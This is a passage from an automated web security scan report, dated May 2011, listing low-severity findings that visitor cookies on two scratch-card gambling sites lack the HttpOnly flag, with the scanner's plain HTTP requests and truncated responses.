UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:17 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /PlayersClub.aspx HTTP/1.1
Host: www.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; LanguageCode=ENG; CSI_8=EncryptedUniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=8; ASP.NET_SessionId=2aexru55vqeu1tir5miil0au;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:30:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:17 GMT; path=/
Set-Cookie: BO=FM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:17 GMT; path=/
Set-Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:17 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:17 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:17 GMT; path=/
Set-Cookie: CSITemp=8; domain=scratchcardheaven.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 53351

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.343. http://www.scratchcardheaven.com/Promotions.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scratchcardheaven.com
Path:	/Promotions.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:14 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Promotions.aspx HTTP/1.1
Host: www.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; LanguageCode=ENG; CSI_8=EncryptedUniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=8; ASP.NET_SessionId=2aexru55vqeu1tir5miil0au;

Response

12.344. http://www.scratchcardheaven.com/Responsible.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scratchcardheaven.com
Path:	/Responsible.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:27 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Responsible.aspx HTTP/1.1
Host: www.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; LanguageCode=ENG; CSI_8=EncryptedUniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=8; ASP.NET_SessionId=2aexru55vqeu1tir5miil0au;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:30:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:27 GMT; path=/
Set-Cookie: BO=FM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:27 GMT; path=/
Set-Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:27 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:27 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:27 GMT; path=/
Set-Cookie: CSITemp=8; domain=scratchcardheaven.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 51035

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.345. http://www.scratchcardheaven.com/SecurityAndPrivacy.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scratchcardheaven.com
Path:	/SecurityAndPrivacy.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:26 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /SecurityAndPrivacy.aspx HTTP/1.1
Host: www.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; LanguageCode=ENG; CSI_8=EncryptedUniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=8; ASP.NET_SessionId=2aexru55vqeu1tir5miil0au;

Response

12.346. http://www.scratchcardheaven.com/Terms.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scratchcardheaven.com
Path:	/Terms.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:21 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Terms.aspx HTTP/1.1
Host: www.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; LanguageCode=ENG; CSI_8=EncryptedUniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=8; ASP.NET_SessionId=2aexru55vqeu1tir5miil0au;

Response

12.347. http://www.scratchcardheaven.com/UnderAge.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scratchcardheaven.com
Path:	/UnderAge.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:29 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /UnderAge.aspx HTTP/1.1
Host: www.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; LanguageCode=ENG; CSI_8=EncryptedUniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=8; ASP.NET_SessionId=2aexru55vqeu1tir5miil0au;

Response

12.348. http://www.svenskalotter.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.svenskalotter.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:44 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.svenskalotter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; LanguageCode=SWE; RegistrationMode=PM; CSI_38=EncryptedUniqueVisitorID=62D174B71D19D304565CA856AD1DA299&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; CountryCode=US; CSITemp=38; ASP.NET_SessionId=ysimfk55bzxydeaewbrhme45;

Response

12.349. http://www.svenskalotter.com/AboutUs.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.svenskalotter.com
Path:	/AboutUs.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:45 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AboutUs.aspx HTTP/1.1
Host: www.svenskalotter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; LanguageCode=SWE; RegistrationMode=PM; CSI_38=EncryptedUniqueVisitorID=62D174B71D19D304565CA856AD1DA299&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; CountryCode=US; CSITemp=38; ASP.NET_SessionId=ysimfk55bzxydeaewbrhme45;

Response

12.350. http://www.svenskalotter.com/Affiliates.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.svenskalotter.com
Path:	/Affiliates.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:53 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Affiliates.aspx HTTP/1.1
Host: www.svenskalotter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; LanguageCode=SWE; RegistrationMode=PM; CSI_38=EncryptedUniqueVisitorID=62D174B71D19D304565CA856AD1DA299&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; CountryCode=US; CSITemp=38; ASP.NET_SessionId=ysimfk55bzxydeaewbrhme45;

Response

12.351. http://www.svenskalotter.com/Charity.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.svenskalotter.com
Path:	/Charity.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:46 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Charity.aspx HTTP/1.1
Host: www.svenskalotter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; LanguageCode=SWE; RegistrationMode=PM; CSI_38=EncryptedUniqueVisitorID=62D174B71D19D304565CA856AD1DA299&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; CountryCode=US; CSITemp=38; ASP.NET_SessionId=ysimfk55bzxydeaewbrhme45;

Response

12.352. http://www.svenskalotter.com/ContactUsMail.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.svenskalotter.com
Path:	/ContactUsMail.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:51 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ContactUsMail.aspx HTTP/1.1
Host: www.svenskalotter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; LanguageCode=SWE; RegistrationMode=PM; CSI_38=EncryptedUniqueVisitorID=62D174B71D19D304565CA856AD1DA299&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; CountryCode=US; CSITemp=38; ASP.NET_SessionId=ysimfk55bzxydeaewbrhme45;

Response

12.353. http://www.svenskalotter.com/FairPlay.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.svenskalotter.com
Path:	/FairPlay.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:47 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /FairPlay.aspx HTTP/1.1
Host: www.svenskalotter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; LanguageCode=SWE; RegistrationMode=PM; CSI_38=EncryptedUniqueVisitorID=62D174B71D19D304565CA856AD1DA299&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; CountryCode=US; CSITemp=38; ASP.NET_SessionId=ysimfk55bzxydeaewbrhme45;

Response

12.354. http://www.svenskalotter.com/Help.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.svenskalotter.com
Path:	/Help.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:48 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Help.aspx HTTP/1.1
Host: www.svenskalotter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; LanguageCode=SWE; RegistrationMode=PM; CSI_38=EncryptedUniqueVisitorID=62D174B71D19D304565CA856AD1DA299&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; CountryCode=US; CSITemp=38; ASP.NET_SessionId=ysimfk55bzxydeaewbrhme45;

Response

12.355. http://www.svenskalotter.com/Home.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.svenskalotter.com
Path:	/Home.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CSI_38=EncryptedUniqueVisitorID=0B0F1C435808DDA7C375069D1945E754&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=svenskalotter.com; expires=Fri, 16-May-2031 11:41:58 GMT; path=/
UniqueVisitorID=0B0F1C435808DDA7C375069D1945E754; domain=svenskalotter.com; expires=Fri, 16-May-2014 11:41:58 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.356. http://www.svenskalotter.com/InviteFriend.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.svenskalotter.com
Path:	/InviteFriend.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:49 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /InviteFriend.aspx HTTP/1.1
Host: www.svenskalotter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; LanguageCode=SWE; RegistrationMode=PM; CSI_38=EncryptedUniqueVisitorID=62D174B71D19D304565CA856AD1DA299&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; CountryCode=US; CSITemp=38; ASP.NET_SessionId=ysimfk55bzxydeaewbrhme45;

Response

12.357. http://www.svenskalotter.com/PlayersClub.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.svenskalotter.com
Path:	/PlayersClub.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:50 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /PlayersClub.aspx HTTP/1.1
Host: www.svenskalotter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; LanguageCode=SWE; RegistrationMode=PM; CSI_38=EncryptedUniqueVisitorID=62D174B71D19D304565CA856AD1DA299&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; CountryCode=US; CSITemp=38; ASP.NET_SessionId=ysimfk55bzxydeaewbrhme45;

Response

12.358. http://www.svenskalotter.com/Promotions.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.svenskalotter.com
Path:	/Promotions.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:50 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Promotions.aspx HTTP/1.1
Host: www.svenskalotter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; LanguageCode=SWE; RegistrationMode=PM; CSI_38=EncryptedUniqueVisitorID=62D174B71D19D304565CA856AD1DA299&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; CountryCode=US; CSITemp=38; ASP.NET_SessionId=ysimfk55bzxydeaewbrhme45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:36:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:50 GMT; path=/
Set-Cookie: BO=FM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:50 GMT; path=/
Set-Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:50 GMT; path=/
Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:50 GMT; path=/
Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:50 GMT; path=/
Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 38317

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.359. http://www.svenskalotter.com/Responsible.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.svenskalotter.com
Path:	/Responsible.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:01 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Responsible.aspx HTTP/1.1
Host: www.svenskalotter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; LanguageCode=SWE; RegistrationMode=PM; CSI_38=EncryptedUniqueVisitorID=62D174B71D19D304565CA856AD1DA299&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; CountryCode=US; CSITemp=38; ASP.NET_SessionId=ysimfk55bzxydeaewbrhme45;

Response

12.360. http://www.svenskalotter.com/SecurityAndPrivacy.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.svenskalotter.com
Path:	/SecurityAndPrivacy.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:53 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /SecurityAndPrivacy.aspx HTTP/1.1
Host: www.svenskalotter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; LanguageCode=SWE; RegistrationMode=PM; CSI_38=EncryptedUniqueVisitorID=62D174B71D19D304565CA856AD1DA299&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; CountryCode=US; CSITemp=38; ASP.NET_SessionId=ysimfk55bzxydeaewbrhme45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:36:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:53 GMT; path=/
Set-Cookie: BO=FM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:53 GMT; path=/
Set-Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:53 GMT; path=/
Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:53 GMT; path=/
Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:53 GMT; path=/
Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 35214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.361. http://www.svenskalotter.com/Terms.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.svenskalotter.com
Path:	/Terms.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:53 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Terms.aspx HTTP/1.1
Host: www.svenskalotter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; LanguageCode=SWE; RegistrationMode=PM; CSI_38=EncryptedUniqueVisitorID=62D174B71D19D304565CA856AD1DA299&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; CountryCode=US; CSITemp=38; ASP.NET_SessionId=ysimfk55bzxydeaewbrhme45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:36:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:53 GMT; path=/
Set-Cookie: BO=FM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:53 GMT; path=/
Set-Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:53 GMT; path=/
Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:53 GMT; path=/
Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:53 GMT; path=/
Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 99951

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.362. http://www.svenskalotter.com/UnderAge.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.svenskalotter.com
Path:	/UnderAge.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:04 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /UnderAge.aspx HTTP/1.1
Host: www.svenskalotter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; LanguageCode=SWE; RegistrationMode=PM; CSI_38=EncryptedUniqueVisitorID=62D174B71D19D304565CA856AD1DA299&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; CountryCode=US; CSITemp=38; ASP.NET_SessionId=ysimfk55bzxydeaewbrhme45;

Response

12.363. http://www.svenskalotter.com/click/Svenskalotter.com/SWE/Home/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.svenskalotter.com
Path:	/click/Svenskalotter.com/SWE/Home/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:23 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /click/Svenskalotter.com/SWE/Home/ HTTP/1.1
